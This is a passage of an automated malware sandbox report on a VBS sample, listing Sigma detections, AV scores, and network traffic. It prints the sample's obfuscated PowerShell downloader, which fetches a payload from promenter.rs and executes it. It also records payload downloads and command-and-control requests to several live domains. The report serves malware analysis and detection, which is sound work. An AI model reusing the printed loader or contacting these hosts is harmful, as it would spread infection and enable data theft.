Author: frack113: Data: DesusertionIp: 77.105.36.128, DesusertionIsIpv6: false, DesusertionPort: 443, EventID: 3, Image: C:\Windows\SysWOW64\msiexec.exe, Initiated: true, ProcessId: 7460, Protocol: tcp, SourceIp: 192.168.2.9, SourceIsIpv6: false, SourcePort: 49973

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Source: Process started

Author: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\10145202485.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\10145202485.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 3504, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\10145202485.vbs", ProcessId: 7656, ProcessName: wscript.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Hjemmebagerier Semicontradiction Anelser Raadgivningsvirksomheds #>;$Amtskonger='Galopperende';<#Lgknoldet Squiddle Hypozeuxis Prkeners #>;$Klasselotteriernes=$Argand+$host.UI;If ($Klasselotteriernes) {$Spionkamera++;}function Wirepullers($Whiniest){$Hyperscrupulous=$Synchronizable+$Whiniest.'Length'-$Spionkamera; for( $Alvearies210=4;$Alvearies210 -lt $Hyperscrupulous;$Alvearies210+=5){$Paasyningens++;$Fideikommiserne+=$Whiniest[$Alvearies210];$Milanesisk='Besprinkles';}$Fideikommiserne;}function Baggrundsfarve102($Effektivere){ . ($Schoolgirlism) ($Effektivere);}$Cedertrs=Wirepullers 'UnquMPigho Ef z,keai HanlMasklflueaQuer/ C,n ';$Cedertrs+=Wirepullers 'Simu5Saa..Inte0Pat. odou(Pe pWN,uri P.onAnded,ratoSpurwHy ds .de fedeNJenkTGavm Fold1Dig 0Buen.F.cu0 Fly;Urra ParaWBe iiI fonEs.e6Fris4Hver;Zyg Vidux unn6Mult4Svul;Iiis CnidrPretvYode:F.mi1Unsc3H,an1Duff.Stup0stjd) Geo Str.GAnkeet,enc StokTideoRing/ Sk 2 Nat0Svi.1Prop0Rub,0Hypa1 Ku 0Back1Sla OplaFForuiSterrPateeknu,fElisoDemoxfr m/Endu1Nuth3Ucsu1Comp.Ek p0 El, ';$Pladevenderne=Wirepullers 'Imm UGenls MicE HesRb,ma-NdtraCitrGusure Ko NParaTU,pr ';$Dekagrammet=Wirepullers 'Unphh EfttR,fetThorp plsvari: Kon/Spli/CanupBalerOmsloHelimCa aeInstnFinatBaadeCeylrKrum. R irTimesKvar/ MaaD Disi fgapnoyaoHus dPar,iBetadB li.SkvhpAflnfP.anmBelo ';$Forslagenes37=Wirepullers ' ste>Se p ';$Schoolgirlism=Wirepullers ' ChiiBukoePrutX.riz ';$almengr='Bredendes';$Effektfuldes146='\Stderes.Ide';Baggrundsfarve102 (Wirepullers ' nsa$FromG Ny LB.flo,arrBG staInfelTeks: amacHopehmun aphysI onRGentlsveji KroFBl kTProc=regi$Pr,dEProtNRa gv Udk: ShaaStatp ecaPMav D S.gAFrokt K iASubt+Per,$KardeLiddfUns FDiffELng.KBostTUncoFSl kUSkydLBou.dT aneNondsNoto1Felt4M re6Sera ');Baggrundsfarve102 (Wirepullers ' Shi$ButlGVestlSupeoVerdBUrsta PrelBoom:Blgecvivao Hexw,ageATrylGoutbEComp=Su v$Grild Pr eVeneKFjenacruigSig,RzygoAH.anmPopumUntee U mtT,ls.Frems antpAstrLSortIUnvotSyrm(Byge$StatfKvivO MetRUn.wsZelolBoylAHallG SalES senw beeTjekSChae3Conf7Temp)Sovs ');Baggrundsfarve102 (Wirepullers 'Blnd[mononKommEDy.aTIne .LedeS NorEUncoRSkndv PotICurrCForgEPseupcytooAflbiSpannSp,ntB abmIngeaUnbeN PokANakeGStile aurrSmok]Infi:plec:EquisTandE.ngecV,diUCyliR ChaIApplTTilsYAminP Urkrstiko VerTDeltODemic,olyoAlliLFrie K or=Lill Thu[ Endn A.cE Mu tSing.Spi,S,frie Ya CLsegUForsR W ni racTHalvY SynPHhv rfudgoBurrtLandoi tecSch,oHydrL,peet G nYhercpTricEDo,a]D ne:Van :aflytMr,el FnisAtte1 ,er2Unde ');$Dekagrammet=$Cowage[0];$Metrernes=(Wirepullers ' Ned$Va.dgDr mLP ago agsb DadAkinolOb i: KraEWhipDD ruIAid TBullePokerhe,veF,isS oxe= Geon deleUnplW C m-NyopoUn.xb OpsjNon eUncoCSpanT kuf H emS IndySpilSStiftSokkeRonnm skl.Vi iN,hooeGo dt Sej.Forhw PekEReawbR viCPhallSev,IGruseLew nMonsTFour ');Baggrundsfarve102 ($Metrernes);Baggrundsfarve102 (Wirepullers 'Damm$VoltEParadGsteiSkintDuraePinwrHa re OrcsAars. De.HM,dveMan aDiridSkabe Es rShaks ho[Forp$ HepP,gtvlRammado,bdUni

Suricata Signatures

⊘No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for submitted file

Source: 10145202485.vbs

ReversingLabs: Detection: 18%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Source: unknown	HTTPS traffic detected: 77.105.36.128:443 -> 192.168.2.9:49762 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.105.36.128:443 -> 192.168.2.9:49973 version: TLS 1.2

Source:	Binary string: System.Management.Automation.pdb-2476756634-1003_Classes\WOW6432Node\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32 source: powershell.exe, 00000007.00000002.1692631660.00000000075DF000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb!N source: powershell.exe, 00000007.00000002.1698328991.0000000008448000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdbUGP source: msiexec.exe, 0000000A.00000002.2211492794.000000002450E000.00000040.00001000.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2083611363.000000002401E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: em.Core.pdbE source: powershell.exe, 00000007.00000002.1660415400.0000000002FDD000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: msiexec.exe, msiexec.exe, 0000000A.00000002.2211492794.000000002450E000.00000040.00001000.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2083611363.000000002401E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdbB source: powershell.exe, 00000007.00000002.1692631660.00000000075DF000.00000004.00000020.00020000.00000000.sdmp

Software Vulnerabilities

Suspicious execution chain found

Source: C:\Windows\System32\wscript.exe

Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Source: C:\Program Files (x86)\nGmUtrSSHeyZLhnwDRloQwCXddRunuJbCqTwTybMgJuESbiKDQDsAo\zGmdnmqGCKDq.exe

Code function: 4x nop then xor eax, eax

14_2_00C61EC1

Networking

Uses ping.exe to check the status of other devices and networks

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\PING.EXE ping aszzzw_6777.6777.6777.677e

Source: Joe Sandbox View	IP Address: 194.58.112.174 194.58.112.174
Source: Joe Sandbox View	IP Address: 3.33.130.190 3.33.130.190

Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View	JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /Dipodid.pfm HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: promenter.rsConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /XWpZCkLt231.bin HTTP/1.1User-Agent: 5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: promenter.rsCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /sa87/?1DbH=RRW4t2_hkFqt&w2h=UqcT3NX6Xc6Oa5c5HtJN6Sm3jRGrdUDSppl2CYCGZerglEzU6CQj7u00+cYUshbCTVWQ/5Gc6Lshk9bP6yg8EnOz0KyJHucPzLziv8XmKKnO8TJ+EQ== HTTP/1.1Host: www.svarus.onlineAccept: /Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.0.1; LGL33L/V100 Build/LRX21Y) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/38.0.2125.102 Mobile Safari/537.36
Source: global traffic	HTTP traffic detected: GET /y868/?w2h=/snO2OMeD1KGuCX8I8PTb0wPk7oIGCcnJpJV3p53H8t3rhvkFO7Hu8uja/+IWsU7s0a4pmtYzeb4/oul2jeOgVvnrxX99+b5swpR4hpoIEYOJyEs1w==&1DbH=RRW4t2_hkFqt HTTP/1.1Host: www.newhopetoday.appAccept: /Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.0.1; LGL33L/V100 Build/LRX21Y) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/38.0.2125.102 Mobile Safari/537.36

Source: global traffic	DNS traffic detected: DNS query: aszzzw_6777.6777.6777.677e
Source: global traffic	DNS traffic detected: DNS query: promenter.rs
Source: global traffic	DNS traffic detected: DNS query: www.svarus.online
Source: global traffic	DNS traffic detected: DNS query: www.newhopetoday.app
Source: global traffic	DNS traffic detected: DNS query: www.ladylawher.org

Source: unknown

HTTP traffic detected: POST /y868/ HTTP/1.1Host: www.newhopetoday.appAccept: */*Accept-Language: en-US,enAccept-Encoding: gzip, deflate, brConnection: closeContent-Length: 192Cache-Control: no-cacheContent-Type: application/x-www-form-urlencodedOrigin: http://www.newhopetoday.appReferer: http://www.newhopetoday.app/y868/User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; LGL33L/V100 Build/LRX21Y) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/38.0.2125.102 Mobile Safari/537.36Data Raw: 77 32 68 3d 79 75 50 75 31 37 5a 49 48 6b 72 55 71 6d 61 67 4e 66 54 41 64 45 73 67 6d 4e 4d 34 4d 69 6b 6f 4a 62 6f 64 77 37 55 4f 4f 59 4a 33 69 78 33 78 41 61 7a 59 79 50 75 75 62 59 47 61 4c 73 35 61 73 33 43 2b 2b 6e 78 56 31 72 6e 65 71 4b 57 62 38 41 6e 57 67 6b 76 76 78 43 6d 5a 36 65 66 6b 68 58 52 6c 77 45 35 78 52 56 4d 47 43 58 59 41 32 55 49 39 31 39 4f 73 56 59 65 73 6c 4c 36 6b 6d 46 44 47 34 67 61 6d 63 2f 69 74 4a 57 61 66 68 32 6c 61 66 65 44 66 2b 67 2b 6c 75 65 32 2b 34 41 64 7a 30 47 54 52 37 42 48 44 69 64 69 2f 4d 77 66 43 4a 37 77 5a 5a 6d 42 39 Data Ascii: w2h=yuPu17ZIHkrUqmagNfTAdEsgmNM4MikoJbodw7UOOYJ3ix3xAazYyPuubYGaLs5as3C++nxV1rneqKWb8AnWgkvvxCmZ6efkhXRlwE5xRVMGCXYA2UI919OsVYeslL6kmFDG4gamc/itJWafh2lafeDf+g+lue2+4Adz0GTR7BHDidi/MwfCJ7wZZmB9

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 15 Oct 2024 07:16:35 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeData Raw: 32 34 65 31 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 69 73 5f 61 64 61 70 74 69 76 65 22 20 6c 61 6e 67 3d 22 72 75 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 70 61 72 6b 69 6e 67 22 20 63 6f 6e 74 65 6e 74 3d 22 72 65 67 72 75 2d 72 64 61 70 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 74 69 74 6c 65 3e 77 77 77 2e 73 76 61 72 75 73 2e 6f 6e 6c 69 6e 65 3c 2f 74 69 74 6c 65 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 20 68 72 65 66 3d 22 70 61 72 6b 69 6e 67 2d 72 64 61 70 2d 61 75 74 6f 2e 63 73 73 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 66 61 76 69 63 6f 6e 2e 69 63 6f 3f 31 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 3c 73 63 72 69 70 74 3e 2f 2a 3c 21 5b 43 44 41 54 41 5b 2a 2f 0a 77 69 6e 64 6f 77 2e 74 72 61 63 6b 53 63 72 69 70 74 4c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 3b 0a 2f 2a 5d 5d 3e 2a 2f 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 6f 6e 6c 6f 61 64 3d 22 77 69 6e 64 6f 77 2e 74 72 61 63 6b 53 63 72 69 70 74 4c 6f 61 64 28 27 2f 6d 61 6e 69 66 65 73 74 2e 6a 73 27 29 22 20 6f 6e 65 72 72 6f 72 3d 22 77 69 6e 64 6f 77 2e 74 72 61 63 6b 53 63 72 69 70 74 4c 6f 61 64 28 27 2f 6d 61 6e 69 66 65 73 74 2e 6a 73 27 2c 20 31 29 22 20 73 72 63 3d 22 2f 6d 61 6e 69 66 65 73 74 2e 6a 73 22 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 6f 6e 6c 6f 61 64 3d 22 77 69 6e 64 6f 77 2e 74 72 61 63 6b 53 63 72 69 70 74 4c 6f 61 64 28 27 2f 68 65 61 64 2d 73 63 72 69 70 74 73 2e 6a 73 27 29 22 20 6f 6e 65 72 72 6f 72 3d 22 77 69 6e 64 6f 77 2e 74 72 61 63 6b 53 63 72 69 70 74 4c 6f 61 64 28 27 2f 68 65 61 64 2d 73 63 72 69 70 74 73 2e 6a 73 27 2c 20 31 29 22 20 73 72 63 3d 22 2f 68 65 61 64 2d 73 63 72 69 70 74 73 2e 6a 73 22 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 62 2d 70 61 67 65 20 62 2d 70 61 67 65 5f 74 79 70 65 5f 70 61 72 6b 69 6e 67 20 62 2d 70 61 72 6b 69 6e 67 20 62 2d 70 61 72 6b 69 6e 67 5f 62 67 5f 6c 69 67 68 74 22 3e 3c 68 65 61 64 65 72 20 63 6c 61 73 73 3d 22 62 2d 70 61 72 6b 69 6e 67 5f 5f 68 65 61 64 65 72 20 62 2d 70 61 72 6b 69 6e 67 5f 5f 68 65 61 64 65 72 5f 74 79 70 65 5f 72 64 61 70 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 2d 70 61 72 6b 69 6e 67 5f 5f 68 65 61 64 65 72 2d 6e 6f 74 65 20 62 2d 74 65 78 74 22 3e d0 94 d0 be d0 bc d0 b5 d0 bd 20 d0 b7 d0 b0 d1 80 d0 b5 d0 b3 d0 b8 d1 8
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not Foundcontent-type: text/html; charset=UTF-8x-request-id: d3c17fbc-80cd-4d6d-8237-96a5e076e1a7x-runtime: 0.027190content-length: 17004connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 3c 74 69 74 6c 65 3e 41 63 74 69 6f 6e 20 43 6f 6e 74 72 6f 6c 6c 65 72 3a 20 45 78 63 65 70 74 69 6f 6e 20 63 61 75 67 68 74 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 46 41 46 41 46 41 3b 0a 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 33 33 3b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 62 6f 64 79 2c 20 70 2c 20 6f 6c 2c 20 75 6c 2c 20 74 64 20 7b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 68 65 6c 76 65 74 69 63 61 2c 20 76 65 72 64 61 6e 61 2c 20 61 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 20 20 31 33 70 78 3b 0a 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 38 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 70 72 65 20 7b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 31 70 78 3b 0a 20 20 20 20 20 20 77 68 69 74 65 2d 73 70 61 63 65 3a 20 70 72 65 2d 77 72 61 70 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 70 72 65 2e 62 6f 78 20 7b 0a 20 20 20 20 20 20 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 45 45 45 3b 0a 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 31 30 70 78 3b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 70 78 3b 0a 20 20 20 20 20 20 77 69 64 74 68 3a 20 39 35 38 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 68 65 61 64 65 72 20 7b 0a 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 46 30 46 30 46 30 3b 0a 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 43 35 32 46 32 34 3b 0a 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 2e 35 65 6d 20 31 2e 35 65 6d 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 2e 32 65 6d 20 30 3b 0a 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 31 65 6d 3b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 65 6d 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 68 32 20 7b 0a 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 43 35 32 46 32 34 3b 0a 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 35 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 2e 64 65 74 61 69 6c 73 20 7b 0a 20 20 20 20 20 20 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 44 30 44 30 44 30 3b 0a 20 20 20 20 20 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 34 70 78 3b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 31 65 6d 20 30 70 78 3b 0a 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 77 69 64 74 68 3a 20 39 37 38 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not Foundcontent-type: text/html; charset=UTF-8x-request-id: c1d2363e-b216-499f-98f9-3a3d12834ee0x-runtime: 0.035442content-length: 17031connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 3c 74 69 74 6c 65 3e 41 63 74 69 6f 6e 20 43 6f 6e 74 72 6f 6c 6c 65 72 3a 20 45 78 63 65 70 74 69 6f 6e 20 63 61 75 67 68 74 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 46 41 46 41 46 41 3b 0a 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 33 33 3b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 62 6f 64 79 2c 20 70 2c 20 6f 6c 2c 20 75 6c 2c 20 74 64 20 7b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 68 65 6c 76 65 74 69 63 61 2c 20 76 65 72 64 61 6e 61 2c 20 61 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 20 20 31 33 70 78 3b 0a 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 38 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 70 72 65 20 7b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 31 70 78 3b 0a 20 20 20 20 20 20 77 68 69 74 65 2d 73 70 61 63 65 3a 20 70 72 65 2d 77 72 61 70 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 70 72 65 2e 62 6f 78 20 7b 0a 20 20 20 20 20 20 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 45 45 45 3b 0a 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 31 30 70 78 3b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 70 78 3b 0a 20 20 20 20 20 20 77 69 64 74 68 3a 20 39 35 38 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 68 65 61 64 65 72 20 7b 0a 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 46 30 46 30 46 30 3b 0a 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 43 35 32 46 32 34 3b 0a 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 2e 35 65 6d 20 31 2e 35 65 6d 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 2e 32 65 6d 20 30 3b 0a 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 31 65 6d 3b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 65 6d 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 68 32 20 7b 0a 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 43 35 32 46 32 34 3b 0a 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 35 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 2e 64 65 74 61 69 6c 73 20 7b 0a 20 20 20 20 20 20 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 44 30 44 30 44 30 3b 0a 20 20 20 20 20 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 34 70 78 3b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 31 65 6d 20 30 70 78 3b 0a 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 77 69 64 74 68 3a 20 39 37 38 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not Foundcontent-type: text/html; charset=UTF-8x-request-id: d0a6e81b-5e29-415f-a2ab-27489516dbe5x-runtime: 0.035228content-length: 18043connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 3c 74 69 74 6c 65 3e 41 63 74 69 6f 6e 20 43 6f 6e 74 72 6f 6c 6c 65 72 3a 20 45 78 63 65 70 74 69 6f 6e 20 63 61 75 67 68 74 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 46 41 46 41 46 41 3b 0a 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 33 33 3b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 62 6f 64 79 2c 20 70 2c 20 6f 6c 2c 20 75 6c 2c 20 74 64 20 7b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 68 65 6c 76 65 74 69 63 61 2c 20 76 65 72 64 61 6e 61 2c 20 61 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 20 20 31 33 70 78 3b 0a 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 38 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 70 72 65 20 7b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 31 70 78 3b 0a 20 20 20 20 20 20 77 68 69 74 65 2d 73 70 61 63 65 3a 20 70 72 65 2d 77 72 61 70 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 70 72 65 2e 62 6f 78 20 7b 0a 20 20 20 20 20 20 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 45 45 45 3b 0a 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 31 30 70 78 3b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 70 78 3b 0a 20 20 20 20 20 20 77 69 64 74 68 3a 20 39 35 38 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 68 65 61 64 65 72 20 7b 0a 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 46 30 46 30 46 30 3b 0a 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 43 35 32 46 32 34 3b 0a 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 2e 35 65 6d 20 31 2e 35 65 6d 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 2e 32 65 6d 20 30 3b 0a 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 31 65 6d 3b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 65 6d 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 68 32 20 7b 0a 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 43 35 32 46 32 34 3b 0a 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 35 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 2e 64 65 74 61 69 6c 73 20 7b 0a 20 20 20 20 20 20 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 44 30 44 30 44 30 3b 0a 20 20 20 20 20 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 34 70 78 3b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 31 65 6d 20 30 70 78 3b 0a 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 